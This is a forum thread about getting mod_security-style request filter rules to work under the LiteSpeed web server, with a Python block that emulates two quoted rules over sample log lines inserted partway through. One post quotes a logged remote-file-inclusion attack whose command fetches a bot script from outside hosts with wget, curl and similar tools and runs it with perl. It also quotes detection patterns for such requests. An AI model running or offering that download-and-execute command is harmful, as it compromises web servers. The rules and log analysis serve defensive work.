secfilter not working

felosi

Well-Known Member
#1
I noticed the last few days I haven't been getting any configserver firewall mod security bans in my mail for my server. So I figured it didn't write to /etc/httpd/logs/audit_log like mod security did.
So I went and did some testing with some common exploits I have rules for and didn't get any 403s.
I double checked, made sure the request filter was on. Instead of including the mod security rules with an Include in httpd.conf I copied and pasted my blacklist.conf into a new ruleset in the litespeed admin panel. You can see a copy here www.nix101.com/blacklist.conf. It didn't accept the location match directives so I took them out.

Went back to testing again, nothing. For example you should get a 403 for awstats probe for the request http://secureservertech.com/cgi-bin/awstats/awstats.pl
But if you click the link you notice you only get a 404.

Anyway the most important rules I need are the ones for php shells and stuff like that so I definitely need to get this working. I've looked over any possibility of any mistake I could have made and couldn't find anything.

Any ideas?
 

mistwang

LiteSpeed Staff
#2
LiteSpeed does not write to audit_log.
And if the file does not exist, you will only get 404, as the security check is after that; there is no reason to waste CPU cycles on a request that cannot possibly become a security threat.
You should get the security log from lsws/logs/error.log, everything goes there.
 
#3
We got the same problem. After successfully using mod_security rules with Apache, in LSWS we don't get this working correctly.

In just 1 day one user got hacked by a nasty one:

[03/Jul/2007:15:35:44 +0200] "GET /index.php?page=http://myfox.altervista.org/tool25.dat?&cmd=cd%20/tmp;rm%20BotD.txt;wget%20http://ekipefireforce.iespana.es/BotD.txt;fetch%20http://ekipefireforce.iespana.es/BotD.txt;lwp-download%20http://ekipefireforce.iespana.es/BotD.txt;curl%20-O%20http://ekipefireforce.iespana.es/BotD.txt;lynx%20http://ekipefireforce.iespana.es/BotD.txt;perl%20BotD.txt HTTP/1.1" 200 16541 "-" "Mozilla/3.0 (compatible; Indy Library)"
This attack was by Indy Library, which is stated in the rule
SecFilterSelective HTTP_USER_AGENT "Indy Library"
and this one
SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?" chain
SecFilter "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)"
I'm 100% positive this will not happen in Apache + mod_security. We don't get any errors about wrong rules in /opt/lsws/log/error.log

I already tried making a new Request filter and enabling it, and still nothing.

I'm a little confused about the statement "is equivalent to Apache's mod_security". Can someone explain how to use REQUEST FILTER correctly?

Regards.
 
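To see what the two rules quoted above actually match, here is an added example (not code from the thread, from LiteSpeed, or from mod_security) that runs them as plain regexes over a few constructed access-log lines. The first sample line has the same shape as the hit quoted in the post (a remote `page=http://...dat?` include, a `cmd=` parameter and the "Indy Library" User-Agent); the other two are benign. It is a simplified emulation, not mod_security's engine: URL-decoding the request line and matching case-insensitively are assumptions, and treating a bare `SecFilter` as "request line plus User-Agent" is an assumption too.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined format, shortened). Line 0 mirrors
# the shape of the hit quoted in the thread; lines 1 and 2 are ordinary traffic.
SAMPLE_LOG = [
    '[03/Jul/2007:15:35:44 +0200] "GET /index.php?page=http://myfox.altervista.org/tool25.dat?'
    '&cmd=cd%20/tmp;wget%20http://example.invalid/BotD.txt HTTP/1.1" 200 16541 "-" '
    '"Mozilla/3.0 (compatible; Indy Library)"',
    '[03/Jul/2007:15:36:01 +0200] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '[03/Jul/2007:15:36:10 +0200] "GET /images/logo.png?v=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# The two rules quoted in the thread, as data. A rule is a list of stages and every
# stage must match for the rule to fire (that is what "chain" does in mod_security 1.x).
# "SecFilterSelective VAR" matches one variable; a bare "SecFilter" matches the whole
# request, which this emulation takes to be request line + User-Agent (assumption).
RULES = {
    "indy-library-ua": [("HTTP_USER_AGENT", r"Indy Library")],
    "remote-include-chain": [
        ("THE_REQUEST", r"\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?"),
        ("*", r"((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)"),
    ],
}


def parse_line(line):
    """Split one combined-format log line into its fields, or return None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # mod_security normalises the request before matching; URL-decoding is the part
    # that matters for these rules (so "%20" becomes a space before the regex runs).
    entry["request"] = unquote(entry["request"])
    return entry


def variable(entry, name):
    """Map a mod_security 1.x variable name onto the parsed log fields."""
    if name == "HTTP_USER_AGENT":
        return entry["agent"]
    if name == "THE_REQUEST":
        return entry["request"]
    return entry["request"] + " " + entry["agent"]  # "*": whole request (assumption)


def matched_rules(line):
    """Return the ids of every rule whose stages all match this log line."""
    entry = parse_line(line)
    if entry is None:
        return []
    hits = []
    for rule_id, stages in RULES.items():
        # Case-insensitive matching is an assumption of this emulation.
        if all(re.search(pat, variable(entry, var), re.IGNORECASE) for var, pat in stages):
            hits.append(rule_id)
    return hits


def scan(lines):
    """Return {line_index: [rule ids]} for every line that trips at least one rule."""
    report = {}
    for idx, line in enumerate(lines):
        hits = matched_rules(line)
        if hits:
            report[idx] = hits
    return report


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(f"line {idx}: matched {', '.join(hits)}")
```

The third sample line is the instructive one: `logo.png?v=2` satisfies the first stage of the chain on its own, but because the second stage finds no `page=http`, `cmd=` or similar parameter, the chained rule stays quiet. That is the point of `chain` in these rulesets: the first pattern alone would flag ordinary image requests.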

mistwang

LiteSpeed Staff
#6
With Standard, it works for vhosts configured within our web console, but not for vhosts configured through httpd.conf.
Rules configured from the web console have no effect on Apache vhosts even with Enterprise; the filter rules need to be configured through httpd.conf for Apache vhosts.
 

felosi

Well-Known Member
#9
Well, I was kind of confused at first about it not firing on 404s, but it doesn't, and it does fire on what it's supposed to. It would be nice to have such an option so it's possible to ban people with acunetix scanners and other crap that just guesses over and over regardless of the cms.
It would also be nice if it would write to a separate log and have an option to actually have it write to /etc/httpd/logs/audit_log; that way scripts like configserver will be able to ban IPs firing mod security too many times.
 
#10
mistwang said:
Only Enterprise edition can load security rules from httpd.conf
Wow! That is kind of a biggie. It would be nice if this was noted on the "comparison" page. We were thinking of using the free version for some lower volume boxes just for the DOS protection, but not without the mod_security rules. Time to head back to the drawing board.

Sam
 

vivek

Well-Known Member
#11
Sorry to tell this, but I am having the same issue with the litespeed ent version.
I have had mod_security + apache + CSF and that was great.
I got several mails when modsec blocked a request.
But when I changed to the litespeed ent version, modsec is not working.

Sorry to say, litespeed enterprise can't import modsec rules from httpd.conf, and if it can import them then it can't filter the request.

Need to develop more for accepting modsec rules.

PS: I have modsec 1.9 ruleset.
 

felosi

Well-Known Member
#13
I'd love to be able to use mod_security rules too with LiteSpeed.

Is it possible to import these kinds of rulesets?
http://www.gotroot.com/tiki-index.php?page=mod_security+rules
Of course. I think it has problems with some of them.

But those gotroot rules are very outdated and include LOTS and LOTS and TONS of garbage you will never ever in a million years need. Like filters for apps that are not even made anymore, stuff like that

I have a trimmed down version here
www.nix101.com/mod_security.conf

Now, if you plan on ever starting apache you will need to have modsec 1.95 compiled, or just comment out the include line.

All you do is "Include /whereveruputit/mod_security.conf"
in httpd.conf

I did try the apache style configurations in the lsws admin and it did not work. I don't know if it's supposed to for that or not.
 